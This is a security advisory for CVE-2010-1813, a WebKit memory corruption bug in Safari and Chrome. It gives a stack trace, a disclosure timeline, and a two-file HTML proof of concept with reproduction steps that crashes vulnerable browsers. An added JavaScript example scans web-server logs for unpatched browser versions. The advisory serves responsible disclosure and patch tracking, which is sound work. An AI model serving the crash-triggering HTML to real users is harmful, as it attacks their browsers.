Webkit Memory Corruption

11 Sep 2010 00:00:00 | Reported by Jose Antonio Vazquez Gonzalez | Type: packetstorm | Source: packetstormsecurity.com

WEBKIT MEMORY CORRUPTION VULNERABILITY IN APPLE SAFARI & GOOGLE CHROME

TITLE: WEBKIT (APPLE SAFARI < 4.1.2/5.0.2 & GOOGLE CHROME < 5.0.375.125) MEMORY CORRUPTION VULNERABILITY  
TESTED OS: WINDOWS XP SP3  
SEVERITY: HIGH  
CVE-NUMBER: CVE-2010-1813  
DISCOVERED DATE: 2010-06-29  
FIXED DATE: GOOGLE CHROME (2010-07-26) & APPLE SAFARI (2010-09-08)  
FIXED VERSIONS: GOOGLE CHROME 5.0.375.125 & APPLE SAFARI 4.1.2/5.0.2  
DISCOVERED BY: JOSE A. VAZQUEZ  
  
======ABOUT APPLICATION======  
  
"WebKit is an open source web browser engine. WebKit is also the name of the Mac OS X system framework version  
of the engine that's used by Safari, Dashboard, Mail, and many other OS X applications. WebKit's HTML and  
JavaScript code began as a branch of the KHTML and KJS libraries from KDE..." copied from http://webkit.org/  
  
======DESCRIPTION======  
  
A memory corruption vulnerability was confirmed by the Chromium Security Team. The original stack trace showed a null  
pointer dereference, but other pointers were also corrupted, so the bug is not a plain null dereference.  
  
Stack trace (using Chrome symbols):  
  
WebCore::RenderObject::containingBlock() Line 597  
WebCore::RenderBlock::paintContinuationOutlines() Line 2344  
WebCore::RenderBlock::paintObject() Line 2232  
WebCore::RenderBlock::paint() Line 1980  
WebCore::RenderLayer::paintLayer() Line 2447  
WebCore::RenderLayer::paintList() Line 2499  
WebCore::RenderLayer::paintLayer() Line 2468  
WebCore::RenderLayer::paint() Line 2252  
WebCore::FrameView::paintContents() Line 1943  
WebCore::ScrollView::paint() Line 797  
WebCore::RenderWidget::paint() Line 281  
WebCore::InlineBox::paint() Line 180  
WebCore::InlineFlowBox::paint() Line 682  
WebCore::RootInlineBox::paint() Line 167  
WebCore::RenderLineBoxList::paint() Line 219  
WebCore::RenderBlock::paintContents() Line 2090  
WebCore::RenderBlock::paintObject() Line 2199  
WebCore::RenderBlock::paint() Line 1980  
WebCore::RenderBlock::paintChildren() Line 2127  
WebCore::RenderBlock::paintContents() Line 2092  
WebCore::RenderBlock::paintObject() Line 2199  
WebCore::RenderBlock::paint() Line 1980  
WebCore::RenderLayer::paintLayer() Line 2445  
WebCore::RenderLayer::paintList() Line 2499  
WebCore::RenderLayer::paintLayer() Line 2468  
WebCore::RenderLayer::paint() Line 2252  
WebCore::FrameView::paintContents() Line 1943  
WebCore::ScrollView::paint() Line 797  
WebKit::WebFrameImpl::paintWithContext() Line 1795  
WebKit::WebFrameImpl::paint() Line 1818  
WebKit::WebViewImpl::paint() Line 979  
RenderWidget::PaintRect() Line 390  
RenderWidget::DoDeferredUpdate() Line 501  
RenderWidget::CallDoDeferredUpdate() Line 428  
  
  
======PROOF OF CONCEPT======  
  
File 1.html:  
  
<meta http-equiv="refresh" content="1;URL=1.html" >  
<iframe src="2.html"></iframe>  
  
File 2.html:  
  
<dialog style='position:relative'>  
<h style='outline-style:auto'>X<div></div></h>  
</dialog>  
  
  
======STEPS TO REPRODUCE======  
  
1.- Upload 1.html and 2.html to your server.  
2.- Open 1.html with a vulnerable browser.  
  
-Google Chrome:  
  
3.- Wait a while; the renderer crashes (sad tab).  
  
-Apple Safari:  
  
3.- Wait a while; if no crash occurs, press Ctrl+T (open a new tab) to trigger it.  
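The advisory gives the fixed builds for both browsers. The following is an added example (not part of the original advisory) that turns those version boundaries into a check over web-server access logs: it identifies Chrome and Safari from the User-Agent and flags clients below 5.0.375.125 (Chrome) or below 4.1.2 / 5.0.2 (Safari 4.x / 5.x). The log lines, IP addresses and User-Agent strings are constructed for illustration; the handling of Safari branches other than 4.x and 5.x is an assumption noted in the code.

```javascript
'use strict';

// Added example, not from the original advisory. Fixed versions are taken
// from the advisory header: Chrome 5.0.375.125, Safari 4.1.2 (4.x branch)
// and Safari 5.0.2 (5.x branch).
const CHROME_FIXED = [5, 0, 375, 125];
const SAFARI_FIXED = { 4: [4, 1, 2], 5: [5, 0, 2] };

function parseVersion(s) {
  return s.split('.').map((n) => parseInt(n, 10));
}

// Lexicographic comparison of numeric version tuples; missing parts count as 0.
function compareVersions(a, b) {
  const n = Math.max(a.length, b.length);
  for (let i = 0; i < n; i++) {
    const x = a[i] || 0;
    const y = b[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Identify the WebKit browser in a User-Agent string. Chrome UAs also end
// with a "Safari/<build>" token, so Chrome must be matched first; Safari's
// product version is carried in "Version/x.y.z", not in "Safari/".
function identify(ua) {
  let m = /Chrome\/(\d+(?:\.\d+)*)/.exec(ua);
  if (m) return { browser: 'chrome', version: parseVersion(m[1]) };
  m = /Version\/(\d+(?:\.\d+)*).*Safari\//.exec(ua);
  if (m) return { browser: 'safari', version: parseVersion(m[1]) };
  return null;
}

// true  = below the fixed version named in the advisory
// false = at or above it
// null  = not a browser this advisory covers
function isVulnerable(ua) {
  const id = identify(ua);
  if (!id) return null;
  if (id.browser === 'chrome') {
    return compareVersions(id.version, CHROME_FIXED) < 0;
  }
  // Safari: compare against the fix for the client's branch. Assumption for
  // branches the advisory does not list: older than 4.x is measured against
  // 4.1.2, newer than 5.x against 5.0.2 (so Safari 6+ is never flagged).
  const major = id.version[0];
  const fixed = SAFARI_FIXED[major] || (major < 4 ? SAFARI_FIXED[4] : SAFARI_FIXED[5]);
  return compareVersions(id.version, fixed) < 0;
}

// Apache combined log format: the User-Agent is the last quoted field.
function userAgentOf(line) {
  const m = /"([^"]*)"\s*$/.exec(line);
  return m ? m[1] : null;
}

// Return one record per request made by a browser below the fixed version.
function vulnerableClients(lines) {
  const hits = [];
  for (const line of lines) {
    const ua = userAgentOf(line);
    if (ua === null || isVulnerable(ua) !== true) continue;
    const id = identify(ua);
    hits.push({ ip: line.split(' ')[0], browser: id.browser, version: id.version.join('.') });
  }
  return hits;
}

// Constructed sample log (not real traffic): two Chrome builds either side of
// the fix, two Safari 5 builds either side of the fix, one old Safari 4, one
// non-WebKit browser.
const SAMPLE_LOG = [
  '10.0.0.11 - - [10/Sep/2010:09:14:02 +0200] "GET /1.html HTTP/1.1" 200 118 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"',
  '10.0.0.12 - - [10/Sep/2010:09:14:05 +0200] "GET /1.html HTTP/1.1" 200 118 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4"',
  '10.0.0.13 - - [10/Sep/2010:09:14:09 +0200] "GET /2.html HTTP/1.1" 200 97 "http://example.test/1.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8"',
  '10.0.0.14 - - [10/Sep/2010:09:14:12 +0200] "GET /1.html HTTP/1.1" 200 118 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"',
  '10.0.0.15 - - [10/Sep/2010:09:14:15 +0200] "GET /1.html HTTP/1.1" 200 118 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/4.1.1 Safari/533.17.8"',
  '10.0.0.16 - - [10/Sep/2010:09:14:20 +0200] "GET /1.html HTTP/1.1" 200 118 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9"',
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const h of vulnerableClients(SAMPLE_LOG)) {
    console.log(`${h.ip} ${h.browser} ${h.version} below fixed version (CVE-2010-1813)`);
  }
}
```

Run with `node check-cve-2010-1813.js` against a saved access log by replacing `SAMPLE_LOG` with the file's lines. Note that a User-Agent is client-supplied and trivially spoofed, so this is an inventory aid for spotting unpatched browsers on your own network, not a control.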
  
  
  
======REFERENCES======  
  
[ref-1] -> https://bugs.webkit.org/show_bug.cgi?id=41373  
[ref-2] -> http://googlechromereleases.blogspot.com/2010/07/stable-channel-update_26.html  
[ref-3] -> http://support.apple.com/kb/HT4334  
[ref-4] -> http://spa-s3c.blogspot.com/2010/09/full-responsible-disclosurewebkit-apple.html  
  
  
======DISCLOSURE TIMELINE======  
  
Standard Time Zone: GMT/UTC + 01:00 hour (Spain/Madrid)  
  
[2010-06-29] => Posted a new issue in the Chromium project (with PoCs).  
[2010-06-29] => Chromium confirmed the memory corruption and opened a new WebKit bug.  
[2010-07-26] => Chromium released a fix (Google Chrome 5.0.375.125).  
[2010-09-08] => Apple released a fix (Apple Safari 4.1.2/5.0.2).  
[2010-09-10] => Public disclosure.  
  
  
======CREDITS======  
  
Jose Antonio Vazquez Gonzalez,  
Telecom. Engineer & Sec. Researcher.  
http://spa-s3c.blogspot.com/  
  

Published 11 Sep 2010 00:00 | Vulners AI Score: 0.1 (Low risk) | EPSS: 0.09691